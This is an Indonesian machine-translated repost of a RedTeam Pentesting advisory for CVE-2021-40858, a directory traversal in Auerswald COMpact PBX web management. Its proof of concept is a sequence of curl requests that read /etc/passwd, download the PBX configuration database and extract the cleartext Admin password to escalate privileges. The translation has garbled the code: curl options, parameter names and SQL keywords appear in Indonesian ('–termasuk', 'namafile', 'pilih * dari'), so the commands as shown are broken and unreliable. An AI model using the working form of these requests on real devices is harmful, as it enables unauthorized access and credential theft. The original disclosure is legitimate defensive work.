Pengungkapan File Sewenang-wenang Auerswald COMpact 8.0B

  • Whatsapp
Pengungkapan File Sewenang-wenang Auerswald COMpact 8.0B
Pengungkapan File Sewenang wenang Auerswald COMpact B

News.nextcloud.asia

Saran: Pengungkapan File Sewenang-wenang Auerswald COMpact

RedTeam Pentesting menemukan kerentanan di web-based
antarmuka manajemen Auerswald COMpact 5500R PBX yang memungkinkan
pengguna dengan hak istimewa “sub-admin” untuk mengakses file apa pun di PBX
berkas sistem.

rincian
=======

Produk: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19″), COMmander Basic.2(19 “)
Versi yang Terpengaruh: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))
Versi Tetap: 8.2B
Jenis Kerentanan: Pengungkapan File Sewenang-wenang
Risiko Keamanan: sedang
URL Penjual: https://www.auerswald.de/en/product/compact-5500r
Status Vendor: versi tetap dirilis
URL Saran: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006
Status Penasehat: diterbitkan
CVE: CVE-2021-40858
URL CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858

pengantar
=============

“Alat VoIP yang sepenuhnya modular untuk proses komunikasi yang lebih efisien
Dengan COMpact 5500R, Anda awalnya dilengkapi untuk sehari-hari
bisnis – sekarang dan di masa depan.

Arsitektur sepenuhnya modular dengan 80 saluran IP dan semua fungsi
dari server ITC besar memungkinkan hingga 112 pelanggan dan dengan demikian skala dengan
perusahaan Anda.

Pemeliharaan berkelanjutan dan perluasan perangkat lunak sistem membuat ini
server IP serbaguna, investasi masa depan dalam bisnis apa pun
komunikasi.”

(dari beranda vendor)

Keterangan lebih lanjut
=============

RedTeam Pentesting menemukan bahwa penyerang dengan akses administratif
ke antarmuka manajemen berbasis web PBX (sebagai apa yang disebut “sub-admin”)
dapat mengunduh file arbitrer dari sistem file PBX. Ini termasuk
database konfigurasi yang biasanya tidak dapat diakses yang berisi:
kata sandi untuk pengguna “Admin” yang sangat istimewa dalam teks yang jelas.

Bukti dari konsep
==================

Keriting klien HTTP baris perintah[1] dapat digunakan untuk masuk ke
antarmuka manajemen PBX dengan nama pengguna “sub-admin” dan
kata sandi “verysecretpassword” sebagai berikut:

————————————————– ———————–
$ curl –anyauth –user sub-admin:verysecretpassword –include
https://192.168.1.2/pohon

[…]
HTTP/1.1 200 Oke
Tipe-Konten: aplikasi/json; rangkaian karakter=utf-8;
Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; Hanya Http; Jalur =/
[…]

[{“login”:2,”userId”:2222,[…]}]
————————————————– ———————–

Server mengembalikan ID sesi dalam cookie yang kemudian digunakan untuk memeriksa
tingkat akses:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=ERQMMDGECSGWTII’ –termasuk
https://192.168.1.2/logstatus_state

HTTP/1.1 200 Oke
Tipe-Konten: aplikasi/json; rangkaian karakter=utf-8;
[…]

{“logstatus”: “Sub-Administrator”}
————————————————– ———————–

Dalam manajemen pengguna PBX, tingkat akses “Sub-Administrator” adalah
digunakan untuk akun pengguna yang harus dapat mengkonfigurasi PBX. Di sana
juga merupakan hak akses tingkat tinggi lainnya.

Pengguna dengan hak istimewa “sub-admin” dapat mengonfigurasi musik yang ditahan (Depkes,
“Wartemusik”), dan misalnya mendengarkan musik yang sedang dikonfigurasi.
Untuk melakukan ini, browser meminta file musik dari PBX.

File “alarm1.wav” dapat diakses dengan curl sebagai berikut:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=ERQMMDGECSGWTII’ –termasuk
‘https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav’
‘&pageindex=1’

HTTP/1.1 200 Oke
Tipe-Konten: audio/x-wav; rangkaian karakter =
Konten-Panjang: 132192
Disposisi-konten: lampiran; nama file = “alarm1.wav”
[…]
————————————————– ———————–

Ditemukan bahwa PBX memungkinkan traversal direktori dengan string
“../”, sehingga file “/etc/passwd” dapat diakses sebagai berikut:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=ERQMMDGECSGWTII’ –termasuk
‘https://192.168.1.2/wartemusik_verwaltung_play?’
‘namafile=../../etc/passwd&pageindex=’

HTTP/1.1 200 Oke
[…]
Konten-Panjang: 113
Disposisi-konten: lampiran; nama file=”../../etc/passwd”
[…]

root::0:0:root:/root:/bin/sh
penyimpanan bersih::1:1::/data/ftpd:/bin/false
web::2:2::/opt/auerswald/lighthttpd:/bin/false
————————————————– ———————–

Masalah yang sama hadir dalam fungsi untuk mengelola logo. Biasa
permintaan untuk file “logo1.jpg” ditunjukkan di bawah ini:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=ERQMMDGECSGWTII’ –termasuk
‘https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424’

HTTP/1.1 200 Oke
X-XSS-Perlindungan: 1
Tipe-Konten: image/jpg; rangkaian karakter = UTF-8
Konten-Panjang: 13986
Disposisi-konten: lampiran; nama file=”logo1.jpg”
[…]
————————————————– ———————–

Dengan cara yang sama seperti sebelumnya, file “/etc/passwd” dapat diakses:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=ERQMMDGECSGWTII’ –termasuk
‘https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd’

HTTP/1.1 200 Oke
[…]

root::0:0:root:/root:/bin/sh
penyimpanan bersih::1:1::/data/ftpd:/bin/false
web::2:2::/opt/auerswald/lighthttpd:/bin/false
————————————————– ———————–

Untuk penyerang, file yang menarik adalah SQLite[2] berkas basis data
“/data/db/pbx4.db”. Dapat diunduh sebagai berikut:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=ERQMMDGECSGWTII’ ‘https://’
‘192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db’
> pbx4.db

% Total % Diterima % Xferd Rata-rata Kecepatan Waktu Waktu Waktu Saat Ini
Dload Upload Total Menghabiskan Kecepatan Kiri
100 5120 100 5120 0 0 16253 0 –:–:– –:–:– –:–:– 16305
————————————————– ———————–

File ini berisi kata sandi untuk pengguna “Admin” yang sangat istimewa
Akun:

————————————————– ———————–
$sqlite3 pbx4.db
SQLite versi 3.27.2 25-02-2019 16:06:06
Masukkan “.help” untuk petunjuk penggunaan.

sqlite> .tabel
DbFileVersion PbxMisc

sqlite> pilih * dari PbxMisc;
[…]
AdminPasswdHash |
AdminLogin|Admin
Pin Admin | 43214321
AdminPasswd | S3kr1t!
————————————————– ———————–

Nama pengguna dan kata sandi kemudian dapat digunakan untuk masuk ke web
aplikasi:

————————————————– ———————–
$ curl –user ‘Admin:S3kr1t!’ –anyauth –termasuk
https://192.168.1.2/pohon

HTTP/1.1 200 Oke
Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; Hanya Http; Jalur =/
[…]

[{“login”:3,”userId”:0,”userName”:””,[…]}]
————————————————– ———————–

Memeriksa tingkat akses mengungkapkan hak istimewa baru:

————————————————– ———————–
$ curl –cookie ‘AUERSessionID1234123412=AJXGKBFTCIHSHAC’ –termasuk
https://192.168.1.2/logstatus_state

HTTP/1.1 200 Oke
Tipe-Konten: aplikasi/json; rangkaian karakter=utf-8;
[…]

{“logstatus”: “Administrator”}
————————————————– ———————–

Pengguna “Admin”, berbeda dengan pengguna administratif biasa
(“sub-admin”), dapat mengakses lebih banyak fungsi dan misalnya menerapkan firmware
pembaruan.

Solusi
==========

Nonaktifkan atau batasi akses ke manajemen berbasis web jika memungkinkan.

Memperbaiki
===

Tingkatkan ke versi firmware yang memperbaiki kerentanan ini.

Risiko keamanan
===============

Penyerang yang telah memperoleh akses administratif sebagai apa yang disebut
“sub-admin” dapat mengunduh file database dan mengakses kata sandi untuk
akun “Admin” yang sangat istimewa. Akun ini dapat menggunakan lebih banyak fungsi dan
diperbolehkan untuk menerapkan pembaruan firmware.

Di satu sisi, mengeksploitasi kerentanan ini sudah membutuhkan
akses administratif. Di sisi lain, penyerang dapat mencapai
akses istimewa tinggi ke PBX dan menggunakan fungsi yang tidak tersedia untuk
pengguna “sub-admin”, seperti pembaruan firmware. Secara keseluruhan, kerentanan ini
oleh karena itu dinilai memiliki potensi risiko sedang.

Linimasa
========

2021-08-26 Kerentanan teridentifikasi
2021-09-01 Pelanggan menyetujui pengungkapan kepada vendor
2021-09-10 Vendor diberitahu
2021-09-10 ID CVE diminta
2021-09-10 ID CVE ditetapkan
2021-10-05 Vendor menyediakan akses ke perangkat dengan firmware tetap
2021-10-11 Vendor menyediakan firmware tetap
2021-10-15 RedTeam Pentesting memeriksa perangkat, kerentanan tampaknya diperbaiki
2021-12-06 Saran diterbitkan

Referensi
==========

[1] https://curl.se
[2] https://www.sqlite.org

RedTeam Pentesting GmbH
=========================

RedTeam Pentesting menawarkan tes penetrasi individu yang dilakukan oleh a
tim ahli keamanan TI khusus. Dengan ini, kelemahan keamanan di
jaringan atau produk perusahaan terbongkar dan dapat segera diperbaiki.

Karena hanya ada sedikit ahli di bidang ini, RedTeam Pentesting ingin
berbagi pengetahuan dan meningkatkan pengetahuan publik dengan penelitian di
bidang yang berhubungan dengan keamanan. Hasilnya tersedia untuk umum
nasihat keamanan.

Informasi lebih lanjut tentang RedTeam Pentesting dapat ditemukan di:
https://www.redteam-pentesting.de/

Bekerja di RedTeam Pentesting
===============================

RedTeam Pentesting mencari penguji penetrasi untuk bergabung dengan tim kami
di Aachen, Jerman. Jika anda berminat silahkan kunjungi :
https://www.redteam-pentesting.de/jobs/


RedTeam Pentesting GmbH Telp.: +49 241 510081-0
Dennewartstr. 25-27 Faks : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Pengadilan pendaftaran Jerman: Aachen HRB 14004
Direktur pelaksana: Patrick Hof, Jens Liebchen

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.